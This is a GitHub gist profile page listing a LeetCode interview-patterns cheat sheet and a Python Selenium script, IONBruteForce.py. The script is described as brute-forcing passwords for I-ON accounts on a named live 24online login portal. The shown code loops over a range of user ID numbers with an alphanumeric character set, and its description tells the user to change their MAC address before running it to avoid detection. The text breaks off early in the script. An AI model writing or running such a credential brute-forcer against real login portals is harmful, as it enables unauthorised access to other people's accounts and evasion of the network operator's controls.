Skip to content

Instantly share code, notes, and snippets.

View DoubleGremlin181's full-sized avatar
πŸ’»
Mode: Code

Kavish Hukmani DoubleGremlin181

πŸ’»
Mode: Code
View GitHub Profile
@DoubleGremlin181
DoubleGremlin181 / Common LeetCode Patterns.MD
Last active February 23, 2026 05:32
Coding Interview β€” Common LeetCode Patterns Cheat Sheet

Coding Interview β€” Common LeetCode Patterns Cheat Sheet

All 17 core coding interview patterns. Sorted by commonality Γ— difficulty β€” most frequent and easiest patterns first, rarest and hardest at the bottom. For each: how to spot it, the core idea, a clean code example, and LeetCode practice problems.


1. Two Pointers

Frequency: β˜…β˜…β˜…β˜…β˜… | Difficulty: Easy

@DoubleGremlin181
DoubleGremlin181 / IONBruteForce.py
Created August 22, 2018 05:11
Brute Forces I-ON passwords set via the app. Won't work on manually set passwords. Change your MAC address before running
from selenium import webdriver
import itertools
driver = webdriver.Firefox()
driver.get('https://mahe4.dvois.com/24online/webpages/client.jsp') #Change according to block
chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
for usr in range(140953000,140953300): #Change according to need
print("Brute Forcing for {}".format(usr))